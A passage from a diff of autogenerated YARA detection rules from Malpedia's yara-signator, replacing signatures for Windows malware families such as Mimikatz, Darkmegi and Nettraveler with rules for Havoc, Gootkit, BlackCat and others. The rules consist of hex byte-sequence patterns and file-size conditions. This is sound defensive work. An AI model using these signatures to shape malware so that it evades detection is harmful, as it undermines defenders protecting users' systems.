-		$sequence_7 = { c20400 55 8bec 8b450c 8d4802 668b10 40 }
-		$sequence_8 = { 6a00 6a01 ff15???????? 85c0 7406 8935???????? c605????????01 }
-		$sequence_9 = { 57 e8???????? 8bc7 e8???????? 84c0 750b 68d8db4c00 }
+		$sequence_0 = { 0fb70401 83f82f 750e 488b442430 4883c002 4889442430 }
+		$sequence_1 = { 33c0 488705???????? 48833d????????00 742a 488d0d9f540000 e8???????? 85c0 }
+		$sequence_2 = { 486bc005 c64404588c b801000000 486bc006 c6440458ee }
+		$sequence_3 = { 90 ff15???????? 8bc8 4c8d4c2460 4c8d442458 488d542450 e8???????? }
+		$sequence_4 = { 4863442404 8b4c2404 8b1424 03d1 8bca 034c2408 8bc9 }
+		$sequence_5 = { 488b442428 4889442430 83bc24f000000000 7512 837c242000 750b 488b442430 }
+		$sequence_6 = { 48894c2408 4881ec78030000 488b842488030000 480564010000 4889442428 c744242000000000 eb0a }
+		$sequence_7 = { e8???????? 33d2 48c7c1ffffffff ff9424b0000000 }
+		$sequence_8 = { c7042400000000 8b0424 488b4c2420 0fb70441 85c0 }
+		$sequence_9 = { ff9424c0000000 4889842480010000 b875000000 6689842400010000 b872000000 }
 
 	condition:
-		7 of them and filesize < 294912
+		7 of them and filesize < 115712
 }
-rule MALPEDIA_Win_Darkmegi_Auto : FILE
+rule MALPEDIA_Win_Havoc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a0e854e1-d6b5-5413-b2d6-b8294aeb1c03"
+		id = "e49338ce-e5b7-5533-8149-1afd3e757884"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.darkmegi_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.havoc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.havoc_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "cbefd542cb2be5b91d54762f56be197fb7c2a5e2f979e1fe8e05b6ab3d5c06b3"
+		logic_hash = "b1a82d03442de3dfd518e07ebf86436482be6a35139d23b15b46564ec29f5896"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113198,32 +113311,32 @@ rule MALPEDIA_Win_Darkmegi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { bf???????? 83c9ff 33c0 33d2 f2ae 8b6c2418 f7d1 }
-		$sequence_1 = { 50 687e660480 57 c744241c00000000 }
-		$sequence_2 = { 8bc1 8bf7 8bbc24ac020000 c1e902 f3a5 }
-		$sequence_3 = { 49 3bd9 7cd2 8806 5f 5e }
-		$sequence_4 = { 83d8ff 85c0 0f8420010000 8d842468010000 }
-		$sequence_5 = { 53 ffd5 56 ffd5 57 ff15???????? 5f }
-		$sequence_6 = { 8b8c8424010000 668b5108 52 ffd5 }
-		$sequence_7 = { 83c408 85ff 0f84a8000000 47 68???????? }
-		$sequence_8 = { 8b2d???????? f2ae 8b84249e030000 33db f7d1 }
-		$sequence_9 = { c3 e8???????? 8b0cf59c8cb402 5e }
+		$sequence_0 = { 85c0 7856 488b842488000000 488bb42488000000 4531c9 }
+		$sequence_1 = { 31c0 80bc245e01000001 0f95c0 83c008 }
+		$sequence_2 = { 49c1e504 4c01e9 4c8b01 4d85c0 }
+		$sequence_3 = { 89f8 5b 5e 5f 5d 415c }
+		$sequence_4 = { 4181c0ff0f0000 488b00 4181e000f0ffff 4889542420 4889ca 4883c9ff }
+		$sequence_5 = { 6bc018 44898424c4000000 48c78424c800000001001800 f3a5 83c01f }
+		$sequence_6 = { 85f6 0f95c0 4883c9ff 01c0 8944244c }
+		$sequence_7 = { 4d8b0c3a 48c1e204 4b8d0c01 8b01 49034412f0 4b8d540104 }
+		$sequence_8 = { 4531c0 31d2 e8???????? 4883c428 }
+		$sequence_9 = { 85c0 7856 488b842488000000 488bb42488000000 4531c9 4531c0 488b8c24a0000000 }
 
 	condition:
-		7 of them and filesize < 90304
+		7 of them and filesize < 164864
 }
-rule MALPEDIA_Win_Client_Maximus_Auto : FILE
+rule MALPEDIA_Win_Qaccel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7644986b-8879-5e3c-bd1e-48cdc3ff2e40"
+		id = "1024ae4a-8ecf-5647-a954-71832685cf06"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.client_maximus_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.qaccel_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "2b5d2ecf5b1f20897666cf19bda4b06d4863b096982d3499177f71ebee7c8979"
+		logic_hash = "5f2f18c31debd22ba8cc6fab103208438701251a4ea3f2ead7d07424fdf86ff4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113237,32 +113350,32 @@ rule MALPEDIA_Win_Client_Maximus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c601 39730c 7fe1 891424 e8???????? }
-		$sequence_1 = { 83c601 39730c 7fe1 891424 e8???????? 8b4304 }
-		$sequence_2 = { 8b5330 c744240800800000 c744240400000000 890424 8954240c ff5320 ff15???????? }
-		$sequence_3 = { 89f8 02441500 01c6 89f0 0fb6c0 }
-		$sequence_4 = { 81f900010000 881403 75d1 5b 5e }
-		$sequence_5 = { 8b442420 c70424???????? a3???????? e8???????? b801000000 }
-		$sequence_6 = { 56 53 8b5c2414 8b6c2418 6690 880403 83c001 }
-		$sequence_7 = { 85c0 7438 c70424???????? ffd3 }
-		$sequence_8 = { 89f0 0fb6c0 0fb61403 88140b }
-		$sequence_9 = { 85d2 7511 8b5034 85d2 740a 8b4018 85c0 }
+		$sequence_0 = { 3bd0 0f87ea010000 e9???????? 8b4df4 33ff 81e1ffff0000 }
+		$sequence_1 = { 6a0c 8bd8 ffd7 8bf8 8b4620 8d55f0 52 }
+		$sequence_2 = { 41 83c210 894df8 8b1b }
+		$sequence_3 = { 85c0 0f84b8000000 0f8810000000 0f890a000000 5f }
+		$sequence_4 = { 0f8488000000 53 57 56 8d4d9c e8???????? 8b7da0 }
+		$sequence_5 = { 33c0 8d95fcfeffff f2ae f7d1 2bf9 }
+		$sequence_6 = { 8b45fc 51 8b4df4 2bc1 2bc7 40 99 }
+		$sequence_7 = { 8b1d???????? f7d1 49 742d 8945fc 8d45fc }
+		$sequence_8 = { 03da 668b03 50 ffd6 668b4b02 8bf8 51 }
+		$sequence_9 = { f3a4 668b4df8 668903 66894b02 ff15???????? }
 
 	condition:
 		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Anatova_Ransom_Auto : FILE
+rule MALPEDIA_Win_Rctrl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e12c2517-7ef6-5ecc-b756-da754e1b9232"
+		id = "7ff215c3-2671-5b0b-ba24-88d7d36afa71"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.anatova_ransom_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rctrl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rctrl_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "48354275540a19e149a3ec749fb4eeaa508568399fc971259b74ddc21d53a5fe"
+		logic_hash = "b0421815065d5d9f7baf76708ca03a7d751899f6c6932dc7218ef3afe98a981a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113276,32 +113389,32 @@ rule MALPEDIA_Win_Anatova_Ransom_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b4d8c 4863c9 4839c1 0f832a000000 e9???????? 8b458c }
-		$sequence_1 = { 0f8521000000 488b4598 4989c2 4c89d1 }
-		$sequence_2 = { 48898510ffffff 488d051f580000 48898518ffffff 488d051b580000 }
-		$sequence_3 = { e9???????? 48b80000100000000000 e9???????? 488b45e8 4889442428 }
-		$sequence_4 = { 0f8dd3fcffff 83f808 0f845bfcffff 83f809 0f8477fcffff 83f80a 0f8493fcffff }
-		$sequence_5 = { 488b4d10 488b5528 488945c8 488b4520 48894dc0 }
-		$sequence_6 = { 0fb68597fdffff 83f800 0f8405000000 e9???????? 488b8598fdffff 4989c2 }
-		$sequence_7 = { 488945f0 488b45f0 4883f8ff 0f84aa080000 48b80000000000000000 4989c3 488b45f0 }
-		$sequence_8 = { 4889e5 4881ec70000000 b800000000 8845ff 488b05???????? 4883f800 }
-		$sequence_9 = { 488d05d6390000 488985f8feffff 488d05d5390000 48898500ffffff 488d05d3390000 48898508ffffff }
+		$sequence_0 = { ff75a4 8b4104 8d4dec 51 ff7004 ff15???????? c745a028535700 }
+		$sequence_1 = { 8b0495c8215d00 f644082801 7421 57 e8???????? 59 50 }
+		$sequence_2 = { 8d842454100000 660f13442418 660f13442410 50 660f13442444 ff15???????? 83e802 }
+		$sequence_3 = { 0f85d2000000 8b45b8 85c0 0f85d6020000 0fb64b72 0fb64371 81c900020000 }
+		$sequence_4 = { e8???????? 59 895f34 395f40 740c ff7740 }
+		$sequence_5 = { 56 e8???????? 59 898530fcffff c645fc01 85c0 }
+		$sequence_6 = { 8985c8f6ffff 0f852cfcffff 8b95b4f6ffff 85d2 0f843d010000 8b0495b4155a00 8985ccf6ffff }
+		$sequence_7 = { 33db 57 391e 7438 68???????? ff15???????? }
+		$sequence_8 = { 8d85ece7ffff 6a00 50 68ff030000 8d85fcfbffff 50 ff734c }
+		$sequence_9 = { 50 8d4dc8 e8???????? 85c0 0f84c5070000 895dac c745a870535700 }
 
 	condition:
-		7 of them and filesize < 671744
+		7 of them and filesize < 4315136
 }
-rule MALPEDIA_Win_Nettraveler_Auto : FILE
+rule MALPEDIA_Win_Xbtl_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "96950378-de52-56f3-b780-3b44898a07bb"
+		id = "cc674cdb-617d-59f2-a495-aa1cae2d983f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nettraveler_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xbtl"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.xbtl_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "874696e02901d10cd4804b0fe2c66596a287514a0c9a118564d29a023c32f51c"
+		logic_hash = "f0bc6d62656eb26327c6c65c34f325364618e94666f302ef6065ecc9e58e240b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113315,32 +113428,32 @@ rule MALPEDIA_Win_Nettraveler_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 72ed 8bc3 5e 5b c9 c3 }
-		$sequence_1 = { ffd6 59 50 8d85f8feffff 50 ffd6 59 }
-		$sequence_2 = { 720a 80f939 7705 80c1d0 eb1c 80f961 720a }
-		$sequence_3 = { ff75dc ff15???????? 8b45ec 5f 5b 5e c9 }
-		$sequence_4 = { 50 8d45f4 c745f004000000 50 6813000020 ff750c }
-		$sequence_5 = { 83c40c 6a0a ffd6 8d442418 50 ff742414 ffd3 }
-		$sequence_6 = { 80a5dcf3ffff00 f3ab 66ab aa 8bca 33c0 }
-		$sequence_7 = { 8975f8 8975e4 8975d0 8975c8 8975e8 bf04010000 8d45c8 }
-		$sequence_8 = { 46 46 83ff10 7ce3 6a08 b8???????? 59 }
-		$sequence_9 = { 59 50 8d8580f1ffff 50 ff750c ff15???????? 8945fc }
+		$sequence_0 = { 83c41c 56 e8???????? 83c404 57 e8???????? 8b4df8 }
+		$sequence_1 = { 83c404 33ff b8???????? 8bd6 897c2420 2bd0 }
+		$sequence_2 = { 8b4320 8b95e0fcffff 50 8d8df4feffff 68???????? 51 c6047200 }
+		$sequence_3 = { 51 52 e8???????? 43 83c40c 89450c 3b5df8 }
+		$sequence_4 = { 85ff 75ef c745fcffffffff 6a01 e8???????? 8bf8 8b4f0c }
+		$sequence_5 = { 84c0 7429 0fb63e 0fb6c0 eb12 8b45e0 8a803c884100 }
+		$sequence_6 = { 33d1 03f2 03b4bdb8feffff 8b95b8feffff 8db41ea1ebd96e 8985b0feffff 8b85b4feffff }
+		$sequence_7 = { 8985ccfdffff 83f8ff 0f8409020000 8b95d0fdffff 6a00 8d8de8fdffff 51 }
+		$sequence_8 = { 50 53 68???????? 68???????? 57 e8???????? 57 }
+		$sequence_9 = { 7411 8b45f8 57 50 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 401408
 }
-rule MALPEDIA_Win_Action_Rat_Auto : FILE
+rule MALPEDIA_Win_Krbanker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7c57309a-67d2-511f-b446-07a8dac55b8c"
+		id = "9a0cf891-270c-5b18-9c0c-11605a809801"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.action_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.action_rat_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.krbanker_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "804b12281cf1f625ad4f62982be2e6f06ae13a4b27a9fb038471c045c4dd26b6"
+		logic_hash = "3f68b288c9b94489462004d900c99f82c6cc93e611f88ed341834ce27199e0a6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113354,34 +113467,34 @@ rule MALPEDIA_Win_Action_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c5 8945f0 50 8d45f4 64a300000000 894de8 c745e400000000 }
-		$sequence_1 = { 85c9 7533 8b5508 83c210 52 e8???????? 83c404 }
-		$sequence_2 = { 85c9 740d 68???????? 8d4dd4 e8???????? 8d4dec e8???????? }
-		$sequence_3 = { 50 8b8d84fbffff 51 8d8d64fcffff e8???????? 50 8b958cfbffff }
-		$sequence_4 = { 8bec 83ec08 894dfc 8b45fc 8b08 e8???????? }
-		$sequence_5 = { 43 0010 b543 0010 0007 07 }
-		$sequence_6 = { c645fc03 83ec28 8bf4 896580 8d4de4 51 e8???????? }
-		$sequence_7 = { 8a08 884dff 8b5508 8a02 8845fe 0fb64dff }
-		$sequence_8 = { 52 8b4dfc 83c134 e8???????? 8b4508 83c03c 50 }
-		$sequence_9 = { 8d8d4cffffff e8???????? 8d4dc0 e8???????? 50 8d4dc0 e8???????? }
+		$sequence_0 = { 51 8b4c2410 57 6a01 }
+		$sequence_1 = { 50 ff5208 8b4e04 33c0 85c9 }
+		$sequence_2 = { 8d7908 7413 8b4818 8d5108 8b4904 }
+		$sequence_3 = { 8945c0 ff75c0 ff75c4 ff75c8 ff75cc }
+		$sequence_4 = { 8bf0 83c40c 83feff 0f848f000000 56 57 }
+		$sequence_5 = { 8b4824 33db 49 85c9 0f9cc3 }
+		$sequence_6 = { 53 57 e8???????? 8bf0 83c40c 83feff }
+		$sequence_7 = { 6a00 686c000000 6801000000 bb40010000 e8???????? }
+		$sequence_8 = { 8b4104 894504 8b5108 895508 8b410c }
+		$sequence_9 = { 6801010080 6a00 6870000000 6801000000 bb40010000 }
 
 	condition:
-		7 of them and filesize < 480256
+		7 of them and filesize < 1826816
 }
-rule MALPEDIA_Win_Pteranodon_Auto : FILE
+rule MALPEDIA_Win_Gootkit_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "80ff2986-5474-5ad7-b810-831fbf1d4342"
+		id = "a3a6e6c9-1219-5f09-a9d1-18bdb3a0aef0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pteranodon_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gootkit_auto.yar#L1-L333"
 		license_url = "N/A"
-		logic_hash = "cb9eee2c2b40d73ca9d2882bf4c44ed595c9eb29005a317bb6423459f15ea4d1"
+		logic_hash = "07bd7f30e8bca19c8b0b8ce140e27e4d72a01335eb0ac2905d18ed037638c9b8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -113393,40 +113506,61 @@ rule MALPEDIA_Win_Pteranodon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d0dc02b4300 ba1b000000 e9???????? a900000080 7517 ebd4 a9ffff0f00 }
-		$sequence_1 = { 56 8b0485b8690310 33db 8b7508 57 }
-		$sequence_2 = { c1e002 50 8b85a4f8ffff 0fb70485fcef0210 8d0485f8e60210 50 }
-		$sequence_3 = { 8d75c0 8d0417 0f4375c0 8945d0 8d0416 }
-		$sequence_4 = { 50 46 e8???????? 83c40c 8d85c8faffff }
-		$sequence_5 = { 50 c745dc9c090310 e8???????? 8b75ec 8bce 8935???????? }
-		$sequence_6 = { ff15???????? 6a00 56 6a00 ff15???????? 6a00 ffb588dbffff }
-		$sequence_7 = { e8???????? 8bb55cfeffff 83c418 03d8 13fa eb0c 039d88feffff }
-		$sequence_8 = { 83e03f 6bc838 8b0495e0874300 8b440818 83f8ff }
-		$sequence_9 = { 8bd8 e8???????? 8bf8 c645fc01 b883de1b43 }
-		$sequence_10 = { 56 57 8d3c85d8844300 8b07 83ceff 3bc6 }
-		$sequence_11 = { 7213 40 8d8df0f8ffff 50 ffb5f0f8ffff e8???????? }
-		$sequence_12 = { e8???????? 83c404 8b45b8 33db }
-		$sequence_13 = { 8b55f0 897734 83c714 c74304???????? 8d7028 c6434c00 }
-		$sequence_14 = { 8bb590dbffff 56 50 8b8584dbffff 83c004 50 }
-		$sequence_15 = { f6c201 742b 8d55e8 2bd6 881c32 8d7601 }
+		$sequence_0 = { 83ec30 53 8bc1 0f57c0 56 57 8d4df8 }
+		$sequence_1 = { 833b00 7406 837b0400 7502 }
+		$sequence_2 = { 7407 33c9 e8???????? 8b5dfc ff75f4 6a00 ff15???????? }
+		$sequence_3 = { 6a02 5b 8975f0 e8???????? 8d45fc 33d2 }
+		$sequence_4 = { 59 85c0 0f84af000000 2bc6 8bce 8bd0 e8???????? }
+		$sequence_5 = { 51 8bcb e8???????? 59 85c0 740c }
+		$sequence_6 = { ff15???????? 50 ffd6 8bc7 893d???????? }
+		$sequence_7 = { 55 8bec 83ec14 53 57 8955f4 8bd9 }
+		$sequence_8 = { f3aa 68???????? ff15???????? 50 }
+		$sequence_9 = { 8b7df4 32c0 8b4de4 f3aa }
+		$sequence_10 = { 50 68???????? ff15???????? 85c0 7505 e8???????? }
+		$sequence_11 = { 50 e8???????? 83c40c 68fd000000 }
+		$sequence_12 = { 50 8b4508 8b00 99 52 50 }
+		$sequence_13 = { c705????????01000000 c705????????02000000 8be5 5d c3 55 }
+		$sequence_14 = { 833d????????00 750a 6a32 ff15???????? }
+		$sequence_15 = { e8???????? 6a0c 6a08 ff15???????? }
+		$sequence_16 = { 6808020000 6a00 ff15???????? 50 ff15???????? }
+		$sequence_17 = { 6a02 ff15???????? 6888130000 ff15???????? }
+		$sequence_18 = { 8d45fc 50 6a01 6a01 6a00 6800000002 }
+		$sequence_19 = { e8???????? 85c0 750c c705????????03000000 }
+		$sequence_20 = { e8???????? 85c0 740d 6810270000 }
+		$sequence_21 = { 68???????? 51 51 ff15???????? 50 }
+		$sequence_22 = { 53 53 53 8901 }
+		$sequence_23 = { 83faff 7508 ff15???????? 8bd0 }
+		$sequence_24 = { ff15???????? ffc3 83fb0a 7cd5 33c0 }
+		$sequence_25 = { 7550 ff15???????? 8bf8 893d???????? }
+		$sequence_26 = { 8d4204 3bc8 7344 2bca }
+		$sequence_27 = { 0f104850 0f114f50 0f104060 0f114760 8b4070 894770 }
+		$sequence_28 = { 8bf2 8d4601 57 50 }
+		$sequence_29 = { 8b8de4fdffff 8b36 85f6 75a2 8b3f }
+		$sequence_30 = { 53 33db e8???????? ff15???????? 8bc8 }
+		$sequence_31 = { 0f104010 0f110f 0f104820 0f114710 }
+		$sequence_32 = { 3cff 7552 807e0125 754c 8b5e02 }
+		$sequence_33 = { ff15???????? 85c0 7510 8d4864 ff15???????? }
+		$sequence_34 = { 0f104050 0f114f40 0f104860 0f114750 }
+		$sequence_35 = { 0f114710 0f104030 0f114f20 0f104840 0f114730 0f104050 0f114f40 }
+		$sequence_36 = { 7323 8b33 eb19 3ce9 7508 8b4601 83c605 }
 
 	condition:
-		7 of them and filesize < 499712
+		7 of them and filesize < 516096
 }
-rule MALPEDIA_Win_Mimikatz_Auto : FILE
+rule MALPEDIA_Win_Heriplor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7f63ff96-1e0a-5197-8a45-285738861f05"
+		id = "d711b4d9-3914-58b9-9b88-9214444e3dee"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mimikatz_auto.yar#L1-L204"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.heriplor_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "55557ae737b34b617581092058134efff316e946e4bd0657345c0e9223ab37a5"
+		logic_hash = "bf5971e2bb98e2180b60da71db38d7f4898a68723f2588a48c70334b337b7d93"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -113438,44 +113572,32 @@ rule MALPEDIA_Win_Mimikatz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f7f1 85d2 7406 2bca }
-		$sequence_1 = { 83f8ff 750e ff15???????? c7002a000000 }
-		$sequence_2 = { e8???????? 894720 85c0 7413 }
-		$sequence_3 = { ff15???????? b9e9fd0000 8905???????? ff15???????? }
-		$sequence_4 = { c3 81f998000000 7410 81f996000000 7408 81f99b000000 }
-		$sequence_5 = { 83f812 72f1 33c0 c3 }
-		$sequence_6 = { ff5028 8be8 85c0 787a }
-		$sequence_7 = { f30f6f4928 f30f7f8c24a0000000 f30f6f4138 f30f7f8424b8000000 }
-		$sequence_8 = { 6683f83f 7607 32c0 e9???????? }
-		$sequence_9 = { 66894108 33c0 39410c 740b }
-		$sequence_10 = { ff15???????? b940000000 8bd0 89442430 }
-		$sequence_11 = { e8???????? 8bf8 85f6 787a 813d????????401f0000 }
-		$sequence_12 = { 2bc1 85c9 7403 83c008 }
-		$sequence_13 = { 3c02 7207 e8???????? eb10 }
-		$sequence_14 = { a3???????? a1???????? c705????????cf2f4000 8935???????? }
-		$sequence_15 = { 888898d34600 40 ebe9 33c0 8945e4 3d00010000 7d10 }
-		$sequence_16 = { 57 e8???????? 8bf0 83c410 85f6 7415 }
-		$sequence_17 = { 6a08 68???????? e8???????? 68???????? ff15???????? 8b7508 c7465c907f4000 }
-		$sequence_18 = { 39b8a8d54600 0f8491000000 ff45e4 83c030 }
-		$sequence_19 = { 81ca00ffffff 42 0fb692b0e74600 321437 }
-		$sequence_20 = { 8b4508 ff34c530d94600 ff15???????? 5d c3 6a0c 68???????? }
-		$sequence_21 = { 0fb6c8 51 e8???????? 83c404 85c0 7510 }
+		$sequence_0 = { c20c00 55 89e5 56 57 33c9 648b4130 }
+		$sequence_1 = { 40 5b 59 89ec }
+		$sequence_2 = { 8a08 84c9 740d 80c960 01cb c1e301 }
+		$sequence_3 = { 668b13 8b0491 01f8 5f 5e 89ec 5d }
+		$sequence_4 = { 89e5 51 53 33db 33c9 8b4508 }
+		$sequence_5 = { 85ff 7420 46 46 }
+		$sequence_6 = { 7407 83c204 43 43 ebe6 33d2 668b13 }
+		$sequence_7 = { 01fb 8b32 01fe 6a01 ff750c }
+		$sequence_8 = { 3b5d0c 7401 40 5b }
+		$sequence_9 = { 01f9 01fa 01fb 8b32 01fe 6a01 ff750c }
 
 	condition:
-		7 of them and filesize < 1642496
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Smarteyes_Auto : FILE
+rule MALPEDIA_Win_Blackcat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8c7fb874-a11f-5f55-9cef-395ee0219165"
+		id = "96a105c9-de9b-58fc-9332-46741d0ee4b6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smarteyes"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.smarteyes_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.blackcat_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "c5287c273b80d8410483f16228152973a803d8ac51015792b4ca7695eb66f818"
+		logic_hash = "ca17c8ec53cce7ae9541a2b17fcd5b20eeda404acb33b9d6489549a59a5a4868"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -113489,32 +113611,32 @@ rule MALPEDIA_Win_Smarteyes_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bf0 7303 8975f8 53 bb04040000 53 e8???????? }
-		$sequence_1 = { 53 50 e8???????? 59 59 85c0 750d }
-		$sequence_2 = { 56 e8???????? 8bc6 c1f805 8b0485c0f50210 83e61f c1e606 }
-		$sequence_3 = { f785c400000000800000 7407 68???????? eb1c 80bdc600000001 750e 66837d8009 }
-		$sequence_4 = { 8d85a0010000 50 8d4584 56 50 e8???????? 8d85bc030000 }
-		$sequence_5 = { 8b4508 53 56 85c0 0f84f5000000 66833800 0f84eb000000 }
-		$sequence_6 = { b800000004 e9???????? 85c0 7504 84d2 74ee 8bc3 }
-		$sequence_7 = { 85c0 7525 8d442418 50 8d442420 50 ff15???????? }
-		$sequence_8 = { e8???????? 85c0 0f8465010000 8d85c8faffff 8d5001 8a08 }
-		$sequence_9 = { c6041800 8b45f0 eb02 33c0 5e c9 c3 }
+		$sequence_0 = { ffd0 eb09 8d45f8 50 }
+		$sequence_1 = { f20f10459c f20f104da4 8b4df0 8d045b 8d14f500000000 8945e4 8d1452 }
+		$sequence_2 = { 84c0 0f858b010000 8d4704 31db }
+		$sequence_3 = { 89c1 a3???????? ffd1 8b0d???????? 89c6 85c9 751f }
+		$sequence_4 = { 8d441601 29d7 8901 8945d4 897904 0f8486000000 }
+		$sequence_5 = { 0f8765ffffff 8b45e4 01d8 ff75ec ff75dc 50 e8???????? }
+		$sequence_6 = { 895ddc 8b5dec 8b75e0 8b4df0 89d8 }
+		$sequence_7 = { 6820010000 68???????? 6a28 eb23 81f900000200 7326 }
+		$sequence_8 = { 29d9 39f9 721a 01d8 57 52 50 }
+		$sequence_9 = { 56 83ec10 89ce 8b4a04 }
 
 	condition:
-		7 of them and filesize < 429056
+		7 of them and filesize < 29981696
 }
-rule MALPEDIA_Win_Hui_Loader_Auto : FILE
+rule MALPEDIA_Win_Clipog_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "175084ea-2a45-5f42-bda4-3cc233036dd9"
+		id = "22c07191-4d84-5a13-93be-3e166d55b017"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hui_loader"
